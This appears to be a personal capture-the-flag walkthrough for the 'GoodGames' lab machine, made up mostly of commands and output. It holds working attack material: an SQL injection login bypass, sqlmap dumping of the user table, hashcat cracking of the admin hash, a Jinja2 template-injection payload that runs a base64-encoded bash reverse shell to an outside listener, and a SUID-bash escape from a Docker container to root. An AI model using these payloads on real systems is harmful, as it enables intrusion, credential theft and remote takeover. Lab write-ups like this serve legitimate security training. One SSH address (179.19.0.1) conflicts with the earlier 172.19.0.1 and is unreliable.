Machine-Name : GoodGames
IP Address   : 10.129.96.71

Command-Line: sudo nmap 10.129.96.71 -p- -A -T4 -o nmap/init.txt
Result:
    ./nmap/init.txt

Notes: ./dirsearch and gobuster performed
Results:
    ./recon

Notes: SQL injection is possible. At the top right of the screen, there is a person-icon that, when clicked, opens a modal asking for email and password. The email must contain the correct formatting. admin@goodgames.htb was used and captured using BurpSuite. The username was changed to "admin' or 1 = 1-- -" before passing to the server.
Result:
    **SQL Injection**

Notes: Copying the request to file and running it using sqlmap.
File: ./sqlmap/goodgames.req

Command-Line(./sqlmap): sqlmap -r  ./goodgames.req
Result:
    back-end DBMS: MySQL >= 5.0.12

Command-Line(./sqlmap): sqlmap -r  ./goodgames.req --dbs
Result:
    [01:51:10] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [01:51:10] [INFO] fetching database names
    available databases [2]:
    [*] information_schema
    [*] main


Command-Line(./sqlmap): sqlmap -r  ./goodgames.req -D main --tables
Result:
    [01:51:54] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [01:51:54] [INFO] fetching tables for database: 'main'
    Database: main
    [3 tables]
    +---------------+
    | user          |
    | blog          |
    | blog_comments |
    +---------------+

Command-Line(./sqlmap): sqlmap -r  ./goodgames.req -D main -T user --dump
Result:
    Database: main
    Table: user
    [1 entry]
    +----+-------+---------------------+----------------------------------+
    | id | name  | email               | password                         |
    +----+-------+---------------------+----------------------------------+
    | 1  | admin | admin@goodgames.htb | 2b22337f218b2d82dfc3b6f77e7cb8ec |
    +----+-------+---------------------+----------------------------------+

Notes: 2b22337f218b2d82dfc3b6f77e7cb8ec (hashid indicates MD5)

Command-Line(./sqlmap): hashcat -h |grep MD5
Result:
    0 | MD5

Command-Line(./sqlmap): hashcat -m 0 2b22337f218b2d82dfc3b6f77e7cb8ec /usr/share/wordlist/rockyou.txt --show
Result:
    2b22337f218b2d82dfc3b6f77e7cb8ec:superadministrator
    admin:superadministrator

Notes: After logged in, clicked on top right settings-icon.
Result:
    http://internal-administration.goodgames.htb/login

Notes: Username - admnin | Password - superadministrator
Result:
    **LOGGED IN**

Notes: Clicked on "Settings". Found a page which has "Flask SSTI".

Browser: flask ssti payloads
Result:
    https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2

Command-Line: echo "bash -i >& /dev/tcp/10.10.14.42/9001 0>&1" |base64 -w0
Result:
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Mi85MDAxIDA+JjEK
Command-Line: nc -lvnp 9001

Notes: Input into the name field:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Mi85MDAxIDA+JjEK${IFS}|base64${IFS}-d|bash').read() }}
Result:
    root@3a453ab39d3d:/backend#
    **REVERSE-SHELL**

Notes: Checking the /etc/passwd we do not find "augustus". "augustus" is found in the /home/ folder.
root@3a453ab39d3d:/backend# cd /home/augustus/
root@3a453ab39d3d:/home/augustus# cat user.txt
Result:
    15e2fa95df3c06834d1dd9e712bf40ab
    **USER OWNED**

Notes: Files reveal we are in a Docker container.

root@3a453ab39d3d:/home/augustus# cat /etc/hosts
Result:
    172.19.0.2      3a453ab39d3d

root@3a453ab39d3d:/home/augustus# ifconfig
Result:
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 172.19.0.2  netmask 255.255.0.0  broadcast 172.19.255.255
            ether 02:42:ac:13:00:02  txqueuelen 0  (Ethernet)
            RX packets 1875001  bytes 266344471 (254.0 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 1681743  bytes 1471145143 (1.3 GiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
Password: superadministrator
Result:
    augustus@GoodGames:~$
    **SUCCESSFUL**

augustus@GoodGames:~$ cp /bin/bash .

augustus@GoodGames:~$ exit

root@3a453ab39d3d:/home/augustus# chown root:root bash
root@3a453ab39d3d:/home/augustus# chmod 4755 bash
root@3a453ab39d3d:/home/augustus# ssh augustus@179.19.0.1

augustus@GoodGames:~$ ./bash -p
Result:
    bash-5.0#
    **ROOT ACCESS**

bash-5.0# cat /root/root.txt
Result:
    d1bd17e96af60bf5e6d0fc6c6ff18fb5
    **ROOT OWNED**

  **FINISHED**
